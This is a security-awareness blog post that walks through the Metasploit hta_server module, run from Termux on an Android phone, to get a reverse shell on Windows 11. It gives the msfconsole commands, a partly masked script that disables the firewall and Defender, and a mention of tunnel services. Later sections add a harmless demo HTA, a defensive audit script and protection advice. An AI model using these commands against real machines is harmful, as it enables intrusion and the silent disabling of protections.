Security Advice: Preventing Unauthorized Access to Windows 11 in a Local Area Network Using an Android Phone

Osman Kandemir
3 min readFeb 7, 2022

NOTE: This blog post was written for education and to raise awareness of information security. Use the methods described here only with authorization, as part of a legal engagement (white-box or grey-box penetration test). Our main focus is the Security Advice section at the end; be sure to read it.

Hello everyone. On this blog I keep following current technologies and attack scenarios so that we can defend ourselves. This post shows how a cyber attacker on the same local network can take control of a Windows 11 PC from nothing more than an Android phone.

Attacker System : Android 11 (Linux kernel 4.14.190)
Target System : Windows 11 Pro

Tool Used By Cyber Attackers

Termux : Termux is a terminal emulator and Linux environment app for Android. It is not a Debian distribution, but it ships its own package repository with an apt-style package manager (pkg), which is enough to install Ruby and the Metasploit Framework on the phone. (Resources 1, 2)

Figure 1

For example, we will examine the ‘exploit/windows/misc/hta_server’ module in Metasploit. Despite the “exploit” prefix, this module does not exploit a software vulnerability in Windows: it hosts a malicious HTML Application (.hta) file on a small web server and waits for the target user to download and open it. When the user does, mshta.exe executes the attacker’s script and launches the payload. (Resource 3)

What is HTA extension ?

HTA stands for HTML Application. An HTA is a Microsoft Windows program written in HTML whose embedded JScript or VBScript is executed by mshta.exe with the rights of the logged-on user, outside the browser sandbox. That is the whole point for an attacker: the script can create COM objects such as WScript.Shell, start processes and write files, none of which a normal web page in Edge can do. (Resource 5)
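To see the difference between an HTA and a web page for yourself, the following PowerShell script builds a harmless demonstration HTA and then inspects the “Mark of the Web” that a browser download would attach to such a file. This is an added example, not code from the original post: the file name, the HTA contents and the simulated Zone.Identifier stream are my own choices, and the HTA only displays text.

```powershell
# Added example (not from the original post). Builds a harmless .hta in the
# temp folder to show what mshta.exe gives a script that a browser page never
# gets, then shows the Zone.Identifier stream that marks a downloaded file as
# coming from the internet. File name and contents are assumptions of this
# example; nothing here is an exploit.

$HtaPath = Join-Path $env:TEMP 'hta-demo.hta'

# The VBScript inside an HTA runs as a normal desktop program: it can create
# COM objects such as WScript.Shell, read the environment, launch processes or
# write files. A page rendered inside Edge cannot do any of this.
$HtaBody = @'
<html>
<head>
  <title>HTA demo</title>
  <hta:application id="demo" applicationname="HtaDemo" />
  <script language="VBScript">
    Sub Window_OnLoad
      Set sh = CreateObject("WScript.Shell")
      user = sh.ExpandEnvironmentStrings("%USERNAME%")
      host = sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
      document.getElementById("out").innerText = _
        "mshta.exe is running as " & user & " on " & host & _
        " and just created a WScript.Shell object."
    End Sub
  </script>
</head>
<body><pre id="out"></pre></body>
</html>
'@

Set-Content -Path $HtaPath -Value $HtaBody -Encoding ASCII

# Simulate what a browser download does: a file saved from the internet gets a
# Zone.Identifier alternate data stream with ZoneId=3 (Internet). SmartScreen
# and Defender's download (IOAV) scan key off this "Mark of the Web".
Set-Content -Path $HtaPath -Stream 'Zone.Identifier' -Value "[ZoneTransfer]`r`nZoneId=3"

# The checks to run on any file someone asks you to open:
Get-Item -Path $HtaPath -Stream '*' | Select-Object Stream, Length   # lists :$DATA and Zone.Identifier
Get-Content -Path $HtaPath -Stream 'Zone.Identifier'                  # ZoneId=3 means "came from the internet"

# Unblock-File removes the mark. Do that only for a file you actually trust.
# Unblock-File -Path $HtaPath

# Launch the demo deliberately (it only prints a line of text). With real-time
# protection on, a real payload at this step is exactly what Defender scans.
Start-Process -FilePath 'mshta.exe' -ArgumentList ('"{0}"' -f $HtaPath)
```

Run it on an NTFS volume (alternate data streams do not exist on FAT/exFAT). The same Get-Item -Stream and Get-Content -Stream commands work on a file that really came from a browser download, and a missing Zone.Identifier on a file you know was downloaded is itself worth a second look.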

Find the phone’s LAN IP address with the ifconfig (or ip addr) command in Termux. The web server that hosts the malicious .hta file and the listener for the reverse connection must both be bound to that address so the target can reach them.

Terminal :

msfconsole
use exploit/windows/misc/hta_server
set SRVHOST <phone LAN IP from ifconfig>
set LHOST <phone LAN IP from ifconfig>
exploit

Figure 2

The target downloads the malicious HTA file from the web server that the module starts on the phone (Metasploit’s own HTTP server, not Apache) and opens it. Getting the user to do that is social engineering; here we cover only the technical steps.

Figure 3

The cyber criminal now has a reverse shell on the Android phone (Figure 3). From the Meterpreter session, the “shell” command opens a Windows command prompt on the victim’s computer, and with it the malicious person has control of the personal computer.

Figure 4

These steps were performed with Windows 11 Virus & threat protection turned off (Figure 4). Default, unmodified Metasploit payloads and templates are widely signatured, so with real-time protection on, Defender is expected to block this HTA before it runs.

Figure 5

If someone has physical access to your computer and an administrator account, that malicious person can turn off the Windows 11 firewall and Defender antivirus protection with the following commands and PowerShell script (Figure 5). One important caveat: on Windows 11, Tamper Protection is on by default and blocks Set-MpPreference from disabling real-time protection, so the script only works if Tamper Protection was switched off first in the Windows Security app.

Terminal :

# run from an elevated (Administrator) PowerShell
Set-ExecutionPolicy RemoteSigned          # allow locally written scripts to run
.\DefenderAntiVirusTurnOffScript.ps1

The following PowerShell commands are the contents of DefenderAntiVirusTurnOffScript.ps1 (some parameter names are masked with asterisks):

Set-Net****wallProfile -******* False
Set-MpPreference -DisableIntrusionPreventionSystem $true -********************* $true -****************Monitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -Enable*******Protection ********* -Force -MAPSReporting Disabled -SubmitSamplesConsent *********

This PowerShell script is also relevant to another scenario: a criminal with only a few seconds of physical access can carry the same script on a USB flash drive and run it on an unlocked computer.

Security Advice

  • If any options are disabled in Windows 11 Defender, enable them (Figure 4), and keep Tamper Protection on. Microsoft Defender detects default Metasploit payloads and templates, which is exactly why this demonstration required turning it off.
  • If you are tempted to open an untrusted download, scan it first with Windows Defender or upload it to VirusTotal.com or a similar service. (Resource 4) Files downloaded from the internet carry a “Mark of the Web”; do not unblock them.
  • Cybercriminals can use tunnel services such as ngrok.com, serveo.net and localtunnel.me to receive the reverse connection from anywhere on the internet, not only from the local network. Because the victim’s PC makes an outbound connection, the router’s WAN-to-LAN (inbound) firewall does not stop it; check in your router interface and in Windows Defender Firewall that outbound traffic you do not expect is also restricted.
  • Check running programs in Windows 11 Task Manager. Pay attention to cmd.exe, powershell.exe and mshta.exe, especially when they hold a network socket; the Network tab of Resource Monitor, or netstat -ano in a command prompt, shows which process owns each connection.
  • If you leave your computer unattended and logged in, a malicious person may try to turn off Windows Defender or your antivirus application. Lock the screen (Win+L) when you step away, and do not use an administrator account for daily work, since the script above needs administrator rights.
  • Do not allow anyone to plug an unknown USB drive into your personal computer. Windows no longer auto-runs programs from removable drives, but a drive can still carry a script like the one above, or pretend to be a keyboard and type it in.
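The advice above, and the Defender-disabling script in the previous section, are easier to act on with a single audit. The following PowerShell script is an added example, not code from the original post: it reports each Defender and firewall setting that script turns off, lists established connections owned by script hosts or going to Metasploit’s default ports, flags a loosened execution policy, and, with -Fix, reverses the changes. The process and port lists are my own heuristics (4444 is Metasploit’s default LPORT, 8080 its default SRVPORT) and will need tuning on real hosts.

```powershell
# Added example (not from the original post). Audits a Windows 11 PC for the
# Defender and firewall settings that DefenderAntiVirusTurnOffScript.ps1
# disables, for processes holding network connections, and for a loosened
# execution policy. Run from an elevated PowerShell. The process and port
# lists below are assumptions of this example, not facts from the post.
param([switch]$Fix)   # -Fix re-enables what the audit finds disabled

$ScriptHosts = @('mshta', 'powershell', 'pwsh', 'cmd', 'wscript', 'cscript')
$MsfPorts    = @(4444, 8080)

function Get-DefenderFindings {
    # One line per Defender setting that is not in its protective state.
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    $f = New-Object System.Collections.Generic.List[string]
    if (-not $status.AntivirusEnabled)          { $f.Add('Antivirus engine is disabled') }
    if (-not $status.RealTimeProtectionEnabled) { $f.Add('Real-time protection is off') }
    if (-not $status.IoavProtectionEnabled)     { $f.Add('Scanning of downloaded files and attachments (IOAV) is off') }
    if (-not $status.BehaviorMonitorEnabled)    { $f.Add('Behavior monitoring is off') }
    if (-not $status.IsTamperProtected)         { $f.Add('Tamper Protection is off, so Set-MpPreference can silently disable the rest') }
    if ($pref.DisableScriptScanning)            { $f.Add('Script scanning is disabled') }
    if ($pref.DisableIntrusionPreventionSystem) { $f.Add('Network inspection system is disabled') }
    if ([int]$pref.MAPSReporting -eq 0)         { $f.Add('Cloud-delivered protection (MAPS) is disabled') }
    if ([int]$pref.SubmitSamplesConsent -eq 2)  { $f.Add('Sample submission is set to NeverSend') }
    return $f
}

function Get-FirewallFindings {
    # Set-NetFirewallProfile -Enabled False switches every profile off at once.
    Get-NetFirewallProfile |
        Where-Object { [string]$_.Enabled -ne 'True' } |
        ForEach-Object { "Firewall profile '$($_.Name)' is disabled" }
}

function Get-ExecutionPolicyFindings {
    # Report machine- or user-wide policies looser than RemoteSigned.
    Get-ExecutionPolicy -List |
        Where-Object { [string]$_.Scope -in 'LocalMachine', 'CurrentUser' -and
                       [string]$_.ExecutionPolicy -in 'Unrestricted', 'Bypass' } |
        ForEach-Object { "Execution policy for $($_.Scope) is $($_.ExecutionPolicy)" }
}

function Get-SuspiciousConnections {
    # Established TCP connections owned by a script host or shell, or going to
    # a Metasploit default port. A reverse shell is an OUTBOUND connection, so
    # it shows up here even though the router's inbound firewall never saw it.
    Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue | ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        $name = if ($proc) { $proc.ProcessName } else { 'unknown' }
        $why  = @()
        if ($ScriptHosts -contains $name)         { $why += 'script host or shell holding a socket' }
        if ($MsfPorts    -contains $_.RemotePort) { $why += 'Metasploit default port' }
        if ($why.Count -gt 0) {
            [pscustomobject]@{
                Process = $name
                PID     = $_.OwningProcess
                Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
                Reason  = ($why -join '; ')
            }
        }
    }
}

$findings = @(Get-DefenderFindings) + @(Get-FirewallFindings) + @(Get-ExecutionPolicyFindings)
if ($findings.Count -eq 0) { 'Defender, firewall and execution policy look intact.' }
else { $findings | ForEach-Object { "FINDING: $_" } }

Get-SuspiciousConnections | Format-Table -AutoSize

if ($Fix -and $findings.Count -gt 0) {
    # Reverse the post's script. Tamper Protection itself can only be turned
    # back on in the Windows Security app, not from PowerShell.
    Set-MpPreference -DisableRealtimeMonitoring $false -DisableIOAVProtection $false `
        -DisableBehaviorMonitoring $false -DisableScriptScanning $false `
        -DisableIntrusionPreventionSystem $false -MAPSReporting Advanced `
        -SubmitSamplesConsent SendSafeSamples
    Set-NetFirewallProfile -All -Enabled True
    Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy RemoteSigned -Force
}
```

Run it as .\Audit-Defender.ps1 to report only, or .\Audit-Defender.ps1 -Fix to also re-enable protection. Expect powershell.exe itself to appear in the connection list if you run the audit from a remote session; the point of the table is to make an unexplained cmd.exe, mshta.exe or powershell.exe with an open socket stand out, which is what a reverse shell looks like from the victim’s side.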

Stay Safe.

Resources

1. https://hacknos.com/blog/termux-install-on-android-phone/

2. https://linuxhint.com/install-metasploit-in-termux/

3. https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server/

4. https://www.google.com/search?q=virustotal+similar+alternatives

5. https://en.wikipedia.org/wiki/HTML_Application

6. https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.2
